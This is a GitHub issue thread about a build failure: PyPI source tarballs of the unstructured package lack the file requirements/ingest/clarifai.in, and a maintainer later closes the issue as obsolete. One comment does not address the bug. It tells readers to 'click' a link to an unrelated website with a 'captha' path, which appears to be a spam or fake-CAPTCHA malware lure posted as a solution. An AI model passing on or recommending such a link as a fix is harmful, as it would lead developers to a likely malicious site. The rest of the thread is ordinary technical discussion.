### ISSUE TITLE
bug/pypi-incomplete source on PyPI for unstructured (tested 0.5.x)

### ISSUE THREAD

**Issue by petrklus** [Unstructured-IO/unstructured#3704]
**Describe the bug**
The package build fails with the following message:

FileNotFoundError: [Errno 2] No such file or directory: 'requirements/ingest/clarifai.in'

**To Reproduce**

Running the pip install of the package reproduces the error above, if the package needs to be built from the package source. Built distributions not tested.

**Additional context**

While the file in question is present here on github https://github.com/Unstructured-IO/unstructured/releases/tag/0.15.13, it does not seem to be present on PyPI, the link below is indeed missing the file:

https://files.pythonhosted.org/packages/46/40/d88c658898474e40a4b262abd953040c13f1fc684b863458ed069c40254a/unstructured-0.15.13.tar.gz

Reviewed source packages for 0.5.x versions, all seems to be missing the file `requirements/ingest/clarifai.in`. Older versions were not tested.

**Comment by Prateek-coder19** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by scanny** [comment]
Closing as I'm assuming this is no longer a problem since ingest code has moved to `unstructured-ingest`. Please feel free to reopen if it's still a problem (assumedly with a different `.in` file since that one no longer exists).
